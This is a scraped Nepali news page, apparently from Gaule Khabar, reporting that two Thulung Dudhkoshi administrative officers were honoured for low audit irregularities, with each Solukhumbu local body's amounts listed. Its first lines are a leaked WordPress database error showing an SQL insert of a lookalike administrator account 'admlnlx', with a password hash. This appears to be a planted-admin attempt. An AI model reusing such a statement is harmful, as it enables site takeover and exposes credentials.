WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1w3hB9K24baS9Q3hvk6zHCq9LWkn4/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:17:05', '', 'admlnlx', 'admlnlx')

थुलुङदुधकोशीका दुई प्रमुख प्रशासकिय अधिकृत सम्मानित – Gaule Khabar

थुलुङदुधकोशीका दुई प्रमुख प्रशासकिय अधिकृत सम्मानित

थुलुङदुधकोशीका दुई प्रमुख प्रशासकिय अधिकृत सम्मानित

सोलुखुम्बु । थुलुङ दुधकोशी गाउँ पालिकाका प्रमुख प्रशासकिय अधिकृत सम्मानित हुनुभएको छ । जिल्लामै कम बेरुजु भएको स्थानीय तह बनाउन महत्वपुर्ण भुमिका निर्वाह गरेको भन्दै निमित्त प्रमुख प्रशासकिय अधिकृत उद्धब ढुंगाना र पुर्व प्रमुख प्रशासकिय अधिकृत अबिलाल राईलाई सम्मान गरिएको हो ।

गाउँपालिका अध्यक्ष असिम राईले उहाँहरु दुवैजनालाई आज उक्त सम्मान पत्र प्रदान गर्नुभएको हो । लेखाव्यवस्थापन प्रणालि चुस्त नहुँदा बेरुजु आउने कुरालाई ख्याल राख्दै जनशक्ति अभावका बीचमा उत्कृष्ट कार्य गरेको भन्दै सम्मापन गरिएको गाउँपालिकाले जनाएको छ । आगामी दिनमा अझ बेरुजुलाई सून्यमा झार्ने गरि काम गर्न निर्देशन दिदै जनप्रतिनिधिको तर्फबाट सहयोग गर्ने पालिका अध्यक्ष असिम राईले बताए ।

पछिल्लो समय केही सञ्चार माध्यममा सोही बेरुजुलाई भ्रष्टाचार भएको भनी भ्रामक सचार सम्प्रेसन भएको स्मरण गराउँदै अध्यक्ष राईले त्यस्ता खालका गलत मनासय राखेका व्यक्तिलाई उत्कृष्ट कार्यसम्पादनले जवाफ दिनुपर्नेमा जोड दिनुभयो । जनशकि्त अभावका बीचमा उत्कृष्ट कार्य गर्न तलि्लन जनप्रतिनिधिको नाम जोडेर समाचार सम्प्रेसन हुने गरेको भन्दै अध्यक्ष राईले सत्य र तथ्यको जगमा उभिएर काम गर्ने पत्रकारप्रति सधै उच्च सम्मानका साथ हेर्ने बताउँनुभयो ।

जिल्लाको आठ स्थानीय तह मध्ये थुलुङ दुधकोशीको सबैभन्दा कम रु। १ करोड ५१ लाख ४७ हजार बेरुजु रहेको छ भने सबैभन्दा बढी माप्यदुधकोशी गाउँपालिकाको ५ करोड ९३ लाख ३० हजार रुपैयाँ रहेको छ । यस्तै सोताङ गाउँपालिकाको ५ करोड ३२ लाख ५२ हजार रुपैयाँ, खुम्बु पासाङ ल्हामु गाउँपालिकाको ४ करोड १५ लाख ६६ हजार बेरुजू रहेको प्रतिवेदनमा उल्लेख गरिएको छ । यता लिखुपिके गाउँपालिकाको २ करोड ६९ लाख ९५ हजार, नेचासल्यान गाउँपालिकाको २ करोड ९८ लाख ८१ हजार रुपैयाँ, महाकुलुङ गाउँपालिकाको २ करोड २१ लाख १० हजार र सोलुदुधकुण्ड नगरपालिकाको ३ करोड २८ लाख ४९ हजार रकम बेरुजू रहेको महालेखापरीक्षकको कार्यालयको ५९ औँ प्रतिवेदनमा उल्लेख गरिएको छ ।

पछिल्लो समय बेरुजुलाई भ्रष्टाचार भन्ने गरिएको छ । तर बेरुजु भ्रष्टाचार नभइ कुनै पनि सार्वजनिक निकायले कुनै पनि आर्थिक वर्षमा गरेको आर्थिक कारोबारको विषयमा उक्त निकायको उद्देश्य तथा कार्यक्रम अनुसार प्रचलित ऐन नियम बमोजिम कारोबार नगरेको,राख्नु पर्ने लेखा नराखेको वा त्रुटि र अनियमित तरिकाले आर्थिक कारोबार गरेको भनी आन्तरिक लेखा परीक्षण तथा अनि्तम लेखा परीक्षणबाट औँल्याइएको कैफियतलाई बुझाउँछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका